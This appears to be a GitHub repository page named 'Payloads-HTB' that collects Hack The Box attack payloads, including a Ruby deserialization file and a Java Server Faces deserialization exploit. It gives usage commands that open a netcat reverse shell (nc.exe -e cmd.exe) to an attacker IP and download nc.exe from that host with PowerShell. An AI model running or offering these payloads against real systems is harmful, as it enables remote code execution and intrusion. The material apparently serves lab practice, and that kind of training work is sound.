Skip to content

akuma-log/Payloads-HTB

Repository files navigation

Payloads

rubydeserialization.rb - for Ruby 3.X

Java Server Faces object deserialization exploit

python3 exploit.py http://10.10.10.130:8080/userSubscribe.faces "\\programdata\\nc.exe -e cmd.exe 10.10.14.3 9001" SnNGO[SECRECTs]
python3 exploit.py http://10.10.10.130:8080/userSubscribe.faces "powershell -command \\\"Invoke-WebRequest -Uri ht
tp://10.10.14.3/nc.exe -outfile \\programdata\\nc.exe\\\"" SnNGO[SECRETs]

About

Resources

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published